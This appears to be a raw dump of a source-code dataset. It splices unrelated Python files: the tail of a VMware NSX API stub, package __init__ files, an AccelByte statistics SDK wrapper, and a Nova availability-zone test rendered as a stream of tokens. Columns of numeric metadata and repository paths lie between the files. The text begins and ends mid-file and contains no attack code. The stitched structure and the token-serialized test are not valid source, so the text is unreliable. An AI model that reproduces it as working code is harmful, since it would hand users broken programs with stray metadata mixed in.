'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/cluster/restore/instruction-resources',
path_variables={
},
query_parameters={
'instruction_id': 'instruction_id',
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ActionableResourceListResult'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.cluster.restore.instruction_resources',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _StatusStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/cluster/restore/status',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ClusterRestoreStatus'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.cluster.restore.status',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class StubFactory(StubFactoryBase):
_attrs = {
'Backuptimestamps': Backuptimestamps,
'Config': Config,
'InstructionResources': InstructionResources,
'Status': Status,
}
| 41.591418
| 113
| 0.606513
| 2,203
| 22,293
| 5.91557
| 0.102587
| 0.069751
| 0.074816
| 0.092081
| 0.838321
| 0.826044
| 0.801565
| 0.785835
| 0.777087
| 0.761126
| 0
| 0.001125
| 0.282106
| 22,293
| 535
| 114
| 41.669159
| 0.813172
| 0.272731
| 0
| 0.640867
| 1
| 0
| 0.289155
| 0.196179
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040248
| false
| 0
| 0.037152
| 0
| 0.136223
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db18b706bc57a72a791a6751e656e24579c1870e
| 218
|
py
|
Python
|
discord_exchange/orderbook/__init__.py
|
MiltFra/discord-exchange
|
66764a22b74a09ab2f8704884164a5deadddb17a
|
[
"Apache-2.0"
] | null | null | null |
discord_exchange/orderbook/__init__.py
|
MiltFra/discord-exchange
|
66764a22b74a09ab2f8704884164a5deadddb17a
|
[
"Apache-2.0"
] | null | null | null |
discord_exchange/orderbook/__init__.py
|
MiltFra/discord-exchange
|
66764a22b74a09ab2f8704884164a5deadddb17a
|
[
"Apache-2.0"
] | null | null | null |
from discord_exchange.orderbook.orderbook import Orderbook
from discord_exchange.orderbook.user_data import UserData
from discord_exchange.orderbook.order import Order
from discord_exchange.orderbook.trade import Trade
| 54.5
| 58
| 0.894495
| 29
| 218
| 6.551724
| 0.344828
| 0.231579
| 0.4
| 0.589474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068807
| 218
| 4
| 59
| 54.5
| 0.935961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
db2d2667db841a75c415bcc5fd4a5ebbf0b5497c
| 273
|
py
|
Python
|
pyamg/amg_core/tests/__init__.py
|
TareqZaman/pyamg
|
ece7eb38632b5d4618ec4959a23a2ab9956dc232
|
[
"MIT"
] | 371
|
2015-01-11T23:32:12.000Z
|
2022-03-31T12:47:56.000Z
|
pyamg/amg_core/tests/__init__.py
|
TareqZaman/pyamg
|
ece7eb38632b5d4618ec4959a23a2ab9956dc232
|
[
"MIT"
] | 169
|
2015-01-15T15:31:10.000Z
|
2022-03-29T23:03:35.000Z
|
pyamg/amg_core/tests/__init__.py
|
TareqZaman/pyamg
|
ece7eb38632b5d4618ec4959a23a2ab9956dc232
|
[
"MIT"
] | 100
|
2015-01-22T23:21:23.000Z
|
2022-03-22T10:26:41.000Z
|
from .bind_examples import (test1, test2, test3, test4, test5,
test6, test7, test8, test9, test10)
__all__ = [
'test1',
'test2',
'test3',
'test4',
'test5',
'test6',
'test7',
'test8',
'test9',
'test10',
]
| 17.0625
| 63
| 0.483516
| 25
| 273
| 5.08
| 0.6
| 0.15748
| 0.23622
| 0.314961
| 0.80315
| 0.80315
| 0.80315
| 0.80315
| 0.80315
| 0.80315
| 0
| 0.124294
| 0.351648
| 273
| 15
| 64
| 18.2
| 0.59322
| 0
| 0
| 0
| 0
| 0
| 0.186813
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e1e592caeec8ec166cfd2f5ba2db210ff783af8f
| 10,981
|
py
|
Python
|
accelbyte_py_sdk/api/social/wrappers/_stat_configuration.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
accelbyte_py_sdk/api/social/wrappers/_stat_configuration.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | 1
|
2021-10-13T03:46:58.000Z
|
2021-10-13T03:46:58.000Z
|
accelbyte_py_sdk/api/social/wrappers/_stat_configuration.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: justice_py_sdk_codegen/__main__.py
# pylint: disable=duplicate-code
# pylint: disable=line-too-long
# pylint: disable=missing-function-docstring
# pylint: disable=missing-function-docstring
# pylint: disable=missing-module-docstring
# pylint: disable=too-many-arguments
# pylint: disable=too-many-branches
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-lines
# pylint: disable=too-many-locals
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-return-statements
# pylint: disable=too-many-statements
# pylint: disable=unused-import
from typing import Any, Dict, List, Optional, Tuple, Union
from ....core import HeaderStr
from ....core import get_namespace as get_services_namespace
from ....core import run_request
from ....core import run_request_async
from ....core import same_doc_as
from ..models import ErrorEntity
from ..models import StatCreate
from ..models import StatImportInfo
from ..models import StatInfo
from ..models import StatPagingSlicedResult
from ..models import StatUpdate
from ..operations.stat_configuration import CreateStat
from ..operations.stat_configuration import CreateStat1
from ..operations.stat_configuration import DeleteStat
from ..operations.stat_configuration import ExportStats
from ..operations.stat_configuration import GetStat
from ..operations.stat_configuration import GetStats
from ..operations.stat_configuration import ImportStats
from ..operations.stat_configuration import QueryStats
from ..operations.stat_configuration import UpdateStat
from ..models import StatCreateSetByEnum
from ..models import StatInfoSetByEnum, StatInfoStatusEnum
@same_doc_as(CreateStat)
def create_stat(body: Optional[StatCreate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = CreateStat.create(
body=body,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(CreateStat)
async def create_stat_async(body: Optional[StatCreate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = CreateStat.create(
body=body,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(CreateStat1)
def create_stat_1(body: Optional[StatCreate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = CreateStat1.create(
body=body,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(CreateStat1)
async def create_stat_1_async(body: Optional[StatCreate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = CreateStat1.create(
body=body,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(DeleteStat)
def delete_stat(stat_code: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = DeleteStat.create(
stat_code=stat_code,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(DeleteStat)
async def delete_stat_async(stat_code: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = DeleteStat.create(
stat_code=stat_code,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(ExportStats)
def export_stats(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = ExportStats.create(
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(ExportStats)
async def export_stats_async(namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = ExportStats.create(
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetStat)
def get_stat(stat_code: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = GetStat.create(
stat_code=stat_code,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetStat)
async def get_stat_async(stat_code: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = GetStat.create(
stat_code=stat_code,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetStats)
def get_stats(limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = GetStats.create(
limit=limit,
offset=offset,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(GetStats)
async def get_stats_async(limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = GetStats.create(
limit=limit,
offset=offset,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(ImportStats)
def import_stats(file: Optional[Any] = None, replace_existing: Optional[bool] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = ImportStats.create(
file=file,
replace_existing=replace_existing,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(ImportStats)
async def import_stats_async(file: Optional[Any] = None, replace_existing: Optional[bool] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = ImportStats.create(
file=file,
replace_existing=replace_existing,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(QueryStats)
def query_stats(keyword: str, limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = QueryStats.create(
keyword=keyword,
limit=limit,
offset=offset,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(QueryStats)
async def query_stats_async(keyword: str, limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = QueryStats.create(
keyword=keyword,
limit=limit,
offset=offset,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(UpdateStat)
def update_stat(stat_code: str, body: Optional[StatUpdate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = UpdateStat.create(
stat_code=stat_code,
body=body,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(UpdateStat)
async def update_stat_async(stat_code: str, body: Optional[StatUpdate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = UpdateStat.create(
stat_code=stat_code,
body=body,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
| 37.606164
| 199
| 0.711866
| 1,318
| 10,981
| 5.729135
| 0.092564
| 0.121573
| 0.085816
| 0.057211
| 0.823864
| 0.772216
| 0.772216
| 0.772216
| 0.759767
| 0.759767
| 0
| 0.00124
| 0.192241
| 10,981
| 291
| 200
| 37.735395
| 0.850056
| 0.069757
| 0
| 0.742358
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039301
| false
| 0
| 0.126638
| 0
| 0.323144
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e1f1e97858b823c06ab29d17dd2a2ca4c2749802
| 145
|
py
|
Python
|
loldib/getratings/models/NA/na_nasus/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_nasus/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_nasus/__init__.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from .na_nasus_top import *
from .na_nasus_jng import *
from .na_nasus_mid import *
from .na_nasus_bot import *
from .na_nasus_sup import *
| 24.166667
| 28
| 0.758621
| 25
| 145
| 4
| 0.36
| 0.3
| 0.55
| 0.68
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.172414
| 145
| 5
| 29
| 29
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
c00e64af299c4f688916fc8c963d41d7f23c5907
| 25,349
|
py
|
Python
|
nova/tests/unit/test_availability_zones.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/test_availability_zones.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/test_availability_zones.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | 2
|
2017-07-20T17:31:34.000Z
|
2020-07-24T02:42:19.000Z
|
begin_unit
comment|'# Copyright 2013 Netease Corporation'
nl|'\n'
comment|'# All Rights Reserved.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
string|'"""\nTests for availability zones\n"""'
newline|'\n'
nl|'\n'
name|'import'
name|'mock'
newline|'\n'
name|'import'
name|'six'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
name|'import'
name|'availability_zones'
name|'as'
name|'az'
newline|'\n'
name|'import'
name|'nova'
op|'.'
name|'conf'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'context'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'db'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'objects'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'test'
newline|'\n'
nl|'\n'
DECL|variable|CONF
name|'CONF'
op|'='
name|'nova'
op|'.'
name|'conf'
op|'.'
name|'CONF'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|AvailabilityZoneTestCases
name|'class'
name|'AvailabilityZoneTestCases'
op|'('
name|'test'
op|'.'
name|'TestCase'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test case for aggregate based availability zone."""'
newline|'\n'
nl|'\n'
DECL|member|setUp
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'AvailabilityZoneTestCases'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'host'
op|'='
string|"'me'"
newline|'\n'
name|'self'
op|'.'
name|'availability_zone'
op|'='
string|"'nova-test'"
newline|'\n'
name|'self'
op|'.'
name|'default_az'
op|'='
name|'CONF'
op|'.'
name|'default_availability_zone'
newline|'\n'
name|'self'
op|'.'
name|'default_in_az'
op|'='
name|'CONF'
op|'.'
name|'internal_service_availability_zone'
newline|'\n'
name|'self'
op|'.'
name|'context'
op|'='
name|'context'
op|'.'
name|'get_admin_context'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'agg'
op|'='
name|'self'
op|'.'
name|'_create_az'
op|'('
string|"'az_agg'"
op|','
name|'self'
op|'.'
name|'availability_zone'
op|')'
newline|'\n'
nl|'\n'
DECL|member|tearDown
dedent|''
name|'def'
name|'tearDown'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'db'
op|'.'
name|'aggregate_delete'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'self'
op|'.'
name|'agg'
op|'['
string|"'id'"
op|']'
op|')'
newline|'\n'
name|'super'
op|'('
name|'AvailabilityZoneTestCases'
op|','
name|'self'
op|')'
op|'.'
name|'tearDown'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|_create_az
dedent|''
name|'def'
name|'_create_az'
op|'('
name|'self'
op|','
name|'agg_name'
op|','
name|'az_name'
op|')'
op|':'
newline|'\n'
indent|' '
name|'agg_meta'
op|'='
op|'{'
string|"'name'"
op|':'
name|'agg_name'
op|'}'
newline|'\n'
name|'agg'
op|'='
name|'db'
op|'.'
name|'aggregate_create'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'agg_meta'
op|')'
newline|'\n'
nl|'\n'
name|'metadata'
op|'='
op|'{'
string|"'availability_zone'"
op|':'
name|'az_name'
op|'}'
newline|'\n'
name|'db'
op|'.'
name|'aggregate_metadata_add'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'agg'
op|'['
string|"'id'"
op|']'
op|','
name|'metadata'
op|')'
newline|'\n'
nl|'\n'
name|'return'
name|'agg'
newline|'\n'
nl|'\n'
DECL|member|_update_az
dedent|''
name|'def'
name|'_update_az'
op|'('
name|'self'
op|','
name|'aggregate'
op|','
name|'az_name'
op|')'
op|':'
newline|'\n'
indent|' '
name|'metadata'
op|'='
op|'{'
string|"'availability_zone'"
op|':'
name|'az_name'
op|'}'
newline|'\n'
name|'db'
op|'.'
name|'aggregate_update'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'aggregate'
op|'['
string|"'id'"
op|']'
op|','
name|'metadata'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_create_service_with_topic
dedent|''
name|'def'
name|'_create_service_with_topic'
op|'('
name|'self'
op|','
name|'topic'
op|','
name|'host'
op|','
name|'disabled'
op|'='
name|'False'
op|')'
op|':'
newline|'\n'
indent|' '
name|'values'
op|'='
op|'{'
nl|'\n'
string|"'binary'"
op|':'
string|"'bin'"
op|','
nl|'\n'
string|"'host'"
op|':'
name|'host'
op|','
nl|'\n'
string|"'topic'"
op|':'
name|'topic'
op|','
nl|'\n'
string|"'disabled'"
op|':'
name|'disabled'
op|','
nl|'\n'
op|'}'
newline|'\n'
name|'return'
name|'db'
op|'.'
name|'service_create'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'values'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_destroy_service
dedent|''
name|'def'
name|'_destroy_service'
op|'('
name|'self'
op|','
name|'service'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'db'
op|'.'
name|'service_destroy'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'service'
op|'['
string|"'id'"
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_add_to_aggregate
dedent|''
name|'def'
name|'_add_to_aggregate'
op|'('
name|'self'
op|','
name|'service'
op|','
name|'aggregate'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'db'
op|'.'
name|'aggregate_host_add'
op|'('
name|'self'
op|'.'
name|'context'
op|','
nl|'\n'
name|'aggregate'
op|'['
string|"'id'"
op|']'
op|','
name|'service'
op|'['
string|"'host'"
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_delete_from_aggregate
dedent|''
name|'def'
name|'_delete_from_aggregate'
op|'('
name|'self'
op|','
name|'service'
op|','
name|'aggregate'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'db'
op|'.'
name|'aggregate_host_delete'
op|'('
name|'self'
op|'.'
name|'context'
op|','
nl|'\n'
name|'aggregate'
op|'['
string|"'id'"
op|']'
op|','
name|'service'
op|'['
string|"'host'"
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_rest_availability_zone_reset_cache
dedent|''
name|'def'
name|'test_rest_availability_zone_reset_cache'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'az'
op|'.'
name|'_get_cache'
op|'('
op|')'
op|'.'
name|'add'
op|'('
string|"'cache'"
op|','
string|"'fake_value'"
op|')'
newline|'\n'
name|'az'
op|'.'
name|'reset_cache'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'az'
op|'.'
name|'_get_cache'
op|'('
op|')'
op|'.'
name|'get'
op|'('
string|"'cache'"
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_update_host_availability_zone_cache
dedent|''
name|'def'
name|'test_update_host_availability_zone_cache'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test availability zone cache could be update."""'
newline|'\n'
name|'service'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
name|'self'
op|'.'
name|'host'
op|')'
newline|'\n'
nl|'\n'
comment|'# Create a new aggregate with an AZ and add the host to the AZ'
nl|'\n'
name|'az_name'
op|'='
string|"'az1'"
newline|'\n'
name|'cache_key'
op|'='
name|'az'
op|'.'
name|'_make_cache_key'
op|'('
name|'self'
op|'.'
name|'host'
op|')'
newline|'\n'
name|'agg_az1'
op|'='
name|'self'
op|'.'
name|'_create_az'
op|'('
string|"'agg-az1'"
op|','
name|'az_name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_add_to_aggregate'
op|'('
name|'service'
op|','
name|'agg_az1'
op|')'
newline|'\n'
name|'az'
op|'.'
name|'update_host_availability_zone_cache'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'self'
op|'.'
name|'host'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'az1'"
op|','
name|'az'
op|'.'
name|'_get_cache'
op|'('
op|')'
op|'.'
name|'get'
op|'('
name|'cache_key'
op|')'
op|')'
newline|'\n'
name|'az'
op|'.'
name|'update_host_availability_zone_cache'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'self'
op|'.'
name|'host'
op|','
string|"'az2'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'az2'"
op|','
name|'az'
op|'.'
name|'_get_cache'
op|'('
op|')'
op|'.'
name|'get'
op|'('
name|'cache_key'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_set_availability_zone_compute_service
dedent|''
name|'def'
name|'test_set_availability_zone_compute_service'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Test for compute service get right availability zone."""'
newline|'\n'
name|'service'
op|'='
name|'self'
op|'.'
name|'_create_service_with_topic'
op|'('
string|"'compute'"
op|','
name|'self'
op|'.'
name|'host'
op|')'
newline|'\n'
name|'services'
op|'='
name|'db'
op|'.'
name|'service_get_all'
op|'('
name|'self'
op|'.'
name|'context'
op|')'
newline|'\n'
nl|'\n'
comment|'# The service is not add into aggregate, so confirm it is default'
nl|'\n'
comment|'# availability zone.'
nl|'\n'
name|'new_service'
op|'='
name|'az'
op|'.'
name|'set_availability_zones'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'services'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'default_az'
op|','
name|'new_service'
op|'['
string|"'availability_zone'"
op|']'
op|')'
newline|'\n'
nl|'\n'
comment|'# The service is added into aggregate, confirm return the aggregate'
nl|'\n'
comment|'# availability zone.'
nl|'\n'
name|'self'
op|'.'
name|'_add_to_aggregate'
op|'('
name|'service'
op|','
name|'self'
op|'.'
name|'agg'
op|')'
newline|'\n'
name|'new_service'
op|'='
name|'az'
op|'.'
name|'set_availability_zones'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'services'
op|')'
op|'['
number|'0'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'availability_zone'
op|','
nl|'\n'
name|'new_service'
op|'['
string|"'availability_zone'"
op|']'
op|')'
newline|'\n'
nl|'\n'
name|'self'
